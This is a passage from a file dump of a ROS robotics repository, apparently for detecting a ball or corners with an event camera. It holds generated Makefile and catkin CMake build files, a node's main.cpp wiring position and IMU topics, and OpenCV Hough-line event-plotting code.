file\nsrc/rayrotation_events.cpp.s:\n\t$(MAKE) -f CMakeFiles/ball_detector_node.dir/build.make CMakeFiles/ball_detector_node.dir/src/rayrotation_events.cpp.s\n.PHONY : src/rayrotation_events.cpp.s\n\nsrc/rotation_accelerometer.o: src/rotation_accelerometer.cpp.o\n\n.PHONY : src/rotation_accelerometer.o\n\n# target to build an object file\nsrc/rotation_accelerometer.cpp.o:\n\t$(MAKE) -f CMakeFiles/ball_detector_node.dir/build.make CMakeFiles/ball_detector_node.dir/src/rotation_accelerometer.cpp.o\n.PHONY : src/rotation_accelerometer.cpp.o\n\nsrc/rotation_accelerometer.i: src/rotation_accelerometer.cpp.i\n\n.PHONY : src/rotation_accelerometer.i\n\n# target to preprocess a source file\nsrc/rotation_accelerometer.cpp.i:\n\t$(MAKE) -f CMakeFiles/ball_detector_node.dir/build.make CMakeFiles/ball_detector_node.dir/src/rotation_accelerometer.cpp.i\n.PHONY : src/rotation_accelerometer.cpp.i\n\nsrc/rotation_accelerometer.s: src/rotation_accelerometer.cpp.s\n\n.PHONY : src/rotation_accelerometer.s\n\n# target to generate assembly for a file\nsrc/rotation_accelerometer.cpp.s:\n\t$(MAKE) -f CMakeFiles/ball_detector_node.dir/build.make CMakeFiles/ball_detector_node.dir/src/rotation_accelerometer.cpp.s\n.PHONY : src/rotation_accelerometer.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... install/strip\"\n\t@echo \"... install\"\n\t@echo \"... list_install_components\"\n\t@echo \"... davis_corner_genpy\"\n\t@echo \"... davis_corner_generate_messages_py\"\n\t@echo \"... davis_corner_generate_messages_nodejs\"\n\t@echo \"... edit_cache\"\n\t@echo \"... ball_detector_node\"\n\t@echo \"... davis_corner_genlisp\"\n\t@echo \"... davis_corner_generate_messages_lisp\"\n\t@echo \"... davis_corner_generate_messages_eus\"\n\t@echo \"... test\"\n\t@echo \"... davis_corner_generate_messages_cpp\"\n\t@echo \"... _davis_corner_generate_messages_check_deps_Corners\"\n\t@echo \"... hear_msgs_generate_messages_py\"\n\t@echo \"... hear_msgs_generate_messages_nodejs\"\n\t@echo \"... hear_msgs_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_nodejs\"\n\t@echo \"... rosgraph_msgs_generate_messages_py\"\n\t@echo \"... std_msgs_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_lisp\"\n\t@echo \"... dvs_msgs_generate_messages_nodejs\"\n\t@echo \"... rosgraph_msgs_generate_messages_eus\"\n\t@echo \"... dvs_msgs_generate_messages_cpp\"\n\t@echo \"... rosgraph_msgs_generate_messages_cpp\"\n\t@echo \"... roscpp_generate_messages_py\"\n\t@echo \"... davis_corner_gennodejs\"\n\t@echo \"... std_msgs_generate_messages_py\"\n\t@echo \"... davis_corner_generate_messages\"\n\t@echo \"... geometry_msgs_generate_messages_eus\"\n\t@echo \"... roscpp_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... tests\"\n\t@echo \"... download_extra_data\"\n\t@echo \"... run_tests\"\n\t@echo \"... davis_corner_geneus\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... geometry_msgs_generate_messages_nodejs\"\n\t@echo \"... clean_test_results\"\n\t@echo \"... dvs_msgs_generate_messages_eus\"\n\t@echo \"... sensor_msgs_generate_messages_py\"\n\t@echo \"... hear_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... sensor_msgs_generate_messages_cpp\"\n\t@echo \"... sensor_msgs_generate_messages_eus\"\n\t@echo \"... std_msgs_generate_messages_nodejs\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... sensor_msgs_generate_messages_nodejs\"\n\t@echo \"... install/local\"\n\t@echo \"... doxygen\"\n\t@echo \"... sensor_msgs_generate_messages_lisp\"\n\t@echo \"... dvs_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo \"... geometry_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... hear_msgs_generate_messages_cpp\"\n\t@echo \"... davis_corner_gencpp\"\n\t@echo \"... dvs_msgs_generate_messages_py\"\n\t@echo \"... gmock_main\"\n\t@echo \"... gmock\"\n\t@echo \"... gtest_main\"\n\t@echo \"... gtest\"\n\t@echo \"... src/Circle_detector.o\"\n\t@echo \"... src/Circle_detector.i\"\n\t@echo \"... src/Circle_detector.s\"\n\t@echo \"... src/EventPlotting.o\"\n\t@echo \"... src/EventPlotting.i\"\n\t@echo \"... src/EventPlotting.s\"\n\t@echo \"... src/Event_vis.o\"\n\t@echo \"... src/Event_vis.i\"\n\t@echo \"... src/Event_vis.s\"\n\t@echo \"... src/ROSUnit_Optitrack.o\"\n\t@echo \"... src/ROSUnit_Optitrack.i\"\n\t@echo \"... src/ROSUnit_Optitrack.s\"\n\t@echo \"... src/RotationMatrix3by3.o\"\n\t@echo \"... src/RotationMatrix3by3.i\"\n\t@echo \"... src/RotationMatrix3by3.s\"\n\t@echo \"... src/main.o\"\n\t@echo \"... src/main.i\"\n\t@echo \"... src/main.s\"\n\t@echo \"... src/medianFilter.o\"\n\t@echo \"... src/medianFilter.i\"\n\t@echo \"... src/medianFilter.s\"\n\t@echo \"... src/rayrotation_events.o\"\n\t@echo \"... src/rayrotation_events.i\"\n\t@echo \"... src/rayrotation_events.s\"\n\t@echo \"... src/rotation_accelerometer.o\"\n\t@echo \"... src/rotation_accelerometer.i\"\n\t@echo \"... src/rotation_accelerometer.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.5930539965629578,
"alphanum_fraction": 0.5989052653312683,
"avg_line_length": 67.80519104003906,
"blob_id": "68007ef8a458f8e0f2f3ab7d2091a617e2b0efb6",
"content_id": "24da3aa286f88aacd08e79c810623ba60ba8ab5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5298,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 77,
"path": "/src/main.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"Event_vis.hpp\"\n#include \"EventPlotting.hpp\"\n#include \"Circle_detector.hpp\"\n#include <ros/ros.h>\n#include \"rayrotation_events.hpp\"\n#include \"rotation_accelerometer.hpp\"\n#include <opencv2/core/types.hpp>\n#include \"HEAR_ROS_BRIDGE/ROSUnit_Factory.hpp\"\n#include \"ROSUnit_Optitrack.hpp\"\n\n#include <iostream>\n\nint main(int argc, char** argv)\n{\n\nros::init(argc, argv, \"ball_detector_node\");\nros::NodeHandle main_nodehandle;\nROSUnit_Factory ROSUnit_Factory_main{main_nodehandle};\nROSUnit_Optitrack* position_in_z=new ROSUnit_Optitrack(main_nodehandle);\nEvent_vis* visualisation=new Event_vis(main_nodehandle);\nCircle_detector* detection=new Circle_detector(main_nodehandle);\n\nROSUnit* rosunit_x_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/x\");\nROSUnit* rosunit_y_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/y\");\nROSUnit* rosunit_roll_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/roll\");\nROSUnit* rosunit_pitch_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/pitch\");\nROSUnit* rosunit_yaw_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/yaw\");\nROSUnit* rosunit_imu_acceleration = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_GeoVec,\n \"/imu/acceleration\");\nROSUnit* rosunit_camera = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Publisher,\n ROSUnit_msg_type::ROSUnit_Point,\n \"/camera_provider\");\nROSUnit* rosunit_accelerometer = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Publisher,\n ROSUnit_msg_type::ROSUnit_Point,\n \"/accelerometer_rotated\");\n \n\nrayrotation_events* rotate_pv = new rayrotation_events();\nrotation_accelerometer* rotate_accelerometer = new rotation_accelerometer();\n\ndetection->getPorts()[(int)Circle_detector::ports_id::OP_0_DATA]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_0_CAMERA]);\nrosunit_x_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_0]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_1_X_POSITION]);\nrosunit_y_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_1]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_2_Y_POSITION]);\nposition_in_z->getPorts()[(int)ROSUnit_Optitrack::ports_id::OP_0_OPT]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_3_Z_POSITION]);\nrosunit_roll_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_2]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_4_ROLL]);\nrosunit_pitch_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_3]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_5_PITCH]);\nrosunit_yaw_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_4]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_6_YAW]);\n\nrotate_pv->getPorts()[(int)rayrotation_events::ports_id::OP_0_DATA]->connect(rosunit_camera->getPorts()[(int)ROSUnit_PointPub::ports_id::IP_0]);\nrosunit_imu_acceleration->getPorts()[(int)ROSUnit_GeoVecSub::ports_id::OP_0]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_0_IMU]);\nrosunit_roll_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_2]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_1_ROLL]);\nrosunit_pitch_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_3]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_2_PITCH]);\nrosunit_yaw_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_4]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_3_YAW]);\n\nrotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::OP_0_DATA]->connect(rosunit_accelerometer->getPorts()[(int)ROSUnit_PointPub::ports_id::IP_0]);\n\n\n\nros::Rate r(200);\nwhile (ros::ok())\n{\n r.sleep();\n ros::spinOnce();\n}\nreturn 0;\n}\n"
},
{
"alpha_fraction": 0.6335078477859497,
"alphanum_fraction": 0.6675392389297485,
"avg_line_length": 20.27777862548828,
"blob_id": "4b1832d5fd468e06d176c902589f134dabc49abe",
"content_id": "d1066677b60c343c32316ab73cad0dfc78d79389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 18,
"path": "/include/RotationMatrix3by3.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"HEAR_math/Matrix3by3.hpp\"\n#include \"HEAR_math/Vector3D.hpp\"\n#include <iostream>\n#include <eigen3/Eigen/Dense>\n#include <math.h>\n\nusing Eigen::MatrixXd;\n\nclass RotationMatrix3by3 : public Matrix3by3\n{\n private:\n /* data */\n public:\n RotationMatrix3by3(/* args */);\n ~RotationMatrix3by3();\n MatrixXd Update(Vector3D<float>);\n};"
},
{
"alpha_fraction": 0.7206851243972778,
"alphanum_fraction": 0.7378129363059998,
"avg_line_length": 24.33333396911621,
"blob_id": "be535efaf5cd2ecfccb4d49852a125a19403692f",
"content_id": "e4324dac69b8cf4b358f2bd91f66b9d5aa7c02f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 30,
"path": "/include/EventPlotting.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <image_transport/image_transport.h>\n#include <cv_bridge/cv_bridge.h>\n#include <sensor_msgs/image_encodings.h>\n#include <opencv2/imgproc/imgproc.hpp>\n#include <opencv2/highgui/highgui.hpp>\n#include <opencv2/core/types.hpp>\n#include <dvs_msgs/EventArray.h>\n#include <cmath>\n#include \"std_msgs/Float32.h\"\n\nclass EventPlotting\n{\n public:\n ros::NodeHandle nh_;\n ros::Subscriber sub;\n static ros::Publisher pub;\n static cv::Point2f c1;\n static cv::Point2f c2;\n static cv::Point2f center;\n static std_msgs::Float32 msg1;\n\n const std::string OPENCV_WINDOW = \"Image window\";\n static const double vertical_slope_threshold;\n\n EventPlotting(ros::NodeHandle&);\n ~EventPlotting();\n\n static void Events(dvs_msgs::EventArray msg);\n};"
},
{
"alpha_fraction": 0.7910447716712952,
"alphanum_fraction": 0.7960199117660522,
"avg_line_length": 49.25,
"blob_id": "f9f372d6213046fc34b8a46e3ec7f6dfc14f6fb6",
"content_id": "88ee29949128ea3c913d8d9464df835177335c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 4,
"path": "/build/devel/share/davis_corner/cmake/davis_corner-msg-paths.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(davis_corner_MSG_INCLUDE_DIRS \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg\")\nset(davis_corner_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7699766159057617,
"alphanum_fraction": 0.7717597484588623,
"avg_line_length": 34.891998291015625,
"blob_id": "69913fccf0e4269a2ca35377712a38c3b67a8a05",
"content_id": "6d96e6d4229426052d905bf418269cc7242d0abb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 8973,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 250,
"path": "/build/cmake/davis_corner-genmsg.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"davis_corner: 1 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Idavis_corner:/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg;-Istd_msgs:/opt/ros/melodic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(davis_corner_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_custom_target(_davis_corner_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"davis_corner\" \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" \"\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_cpp _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_gencpp)\nadd_dependencies(davis_corner_gencpp davis_corner_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_eus _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_geneus)\nadd_dependencies(davis_corner_geneus davis_corner_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_lisp _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_genlisp)\nadd_dependencies(davis_corner_genlisp davis_corner_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n_generate_msg_nodejs(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_nodejs _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_gennodejs)\nadd_dependencies(davis_corner_gennodejs davis_corner_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_py _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_genpy)\nadd_dependencies(davis_corner_genpy davis_corner_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(davis_corner_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(davis_corner_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(davis_corner_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(davis_corner_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python2\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(davis_corner_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.4723816215991974,
"alphanum_fraction": 0.5261836647987366,
"avg_line_length": 31.045976638793945,
"blob_id": "c0be08e5e27850401b7952dad2ab43818eb0cc1c",
"content_id": "d4f9f87b544eb8e953f082522c9bf97cc17906f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2788,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 87,
"path": "/src/EventPlotting.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"EventPlotting.hpp\"\n\nconst double EventPlotting::vertical_slope_threshold = 60. * (M_PI / 180);\nros::Publisher EventPlotting::pub;\ncv::Point2f EventPlotting::c1;\ncv::Point2f EventPlotting::c2; \ncv::Point2f EventPlotting::center;\nstd_msgs::Float32 EventPlotting::msg1;\n\nEventPlotting::EventPlotting(ros::NodeHandle &t_nh)\n{\n\n nh_ = t_nh;\n sub = nh_.subscribe(\"/dvs/events\", 1, &EventPlotting::Events);\n pub = nh_.advertise<std_msgs::Float32>(\"chatter\", 1000);\n cv::namedWindow(OPENCV_WINDOW);\n}\n\nEventPlotting::~EventPlotting()\n{\n cv::destroyWindow(OPENCV_WINDOW);\n}\n\nvoid EventPlotting::Events(dvs_msgs::EventArray msg)\n{\n cv::Mat EventsWindow = cv::Mat::zeros(260, 346, CV_8UC1);\n cv::Mat cdstP = cv::Mat::zeros(260, 346, CV_8UC1);\n\n for (int i = 0; i < msg.events.size(); i++)\n {\n cv::circle(EventsWindow, cv::Point(msg.events[i].x, msg.events[i].y), 0.5, cv::Scalar(255, 0, 0), -1, 8);\n }\n\n std::vector<cv::Vec4i> linesP;\n HoughLinesP(EventsWindow, linesP, 1, CV_PI / 180, 50, 50, 10);\n if (linesP.size() > 1)\n {\n for (size_t i = 0; i < linesP.size(); i++)\n {\n cv::Vec4i l = linesP[i];\n\n if (fabs(l[0] - l[2]) > 0)\n {\n double angle = fabs(atan((double)(l[3] - l[1]) / (double)(l[2] - l[0])));\n\n if (angle > vertical_slope_threshold)\n {\n cv::line(cdstP, cv::Point(l[0], l[1]), cv::Point(l[2], l[3]), cv::Scalar(255, 0, 0), 3, cv::LINE_AA);\n }\n }\n\n else\n {\n cv::line(cdstP, cv::Point(l[0], l[1]), cv::Point(l[2], l[3]), cv::Scalar(255, 0, 0), 3, cv::LINE_AA);\n }\n }\n std::vector<std::vector<cv::Point>> contours;\n std::vector<cv::Vec4i> hierarchy;\n findContours(cdstP, contours, hierarchy, cv::RETR_EXTERNAL, cv::CHAIN_APPROX_NONE);\n std::vector<cv::Moments> mu(contours.size());\n if (contours.size() > 1)\n {\n mu[0] = moments(contours[0], false);\n c1.x = mu[0].m10 / mu[0].m00;\n c1.y = mu[0].m01 / mu[0].m00;\n mu[1] = moments(contours[1], false);\n c2.x = mu[1].m10 / mu[1].m00;\n c2.y = mu[1].m01 / mu[1].m00;\n center.x = (c2.x + c1.x) / 2;\n center.y = (c1.y + c2.y) / 2;\n }\n msg1.data = center.x;\n pub.publish(msg1);\n cv::circle(cdstP, center, 10, cv::Scalar(255, 0, 0), -1, 8);\n }\n else\n {\n msg1.data = center.x;\n pub.publish(msg1);\n cv::circle(cdstP, center, 10, cv::Scalar(255, 0, 0), -1, 8);\n }\n\n cv::imshow(\"EventsWindow\", EventsWindow);\n imshow(\"Detected Lines (in red) - Probabilistic Line Transform\", cdstP);\n\n cv::waitKey(1);\n}\n"
},
{
"alpha_fraction": 0.6612510085105896,
"alphanum_fraction": 0.6799350380897522,
"avg_line_length": 30.58974266052246,
"blob_id": "1eff27c24b7fe4511aa8ba06c86ac413acacc979",
"content_id": "2d0fdbfb2b01aec142acac05188640012cb9c648",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1231,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 39,
"path": "/include/rotation_accelerometer.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
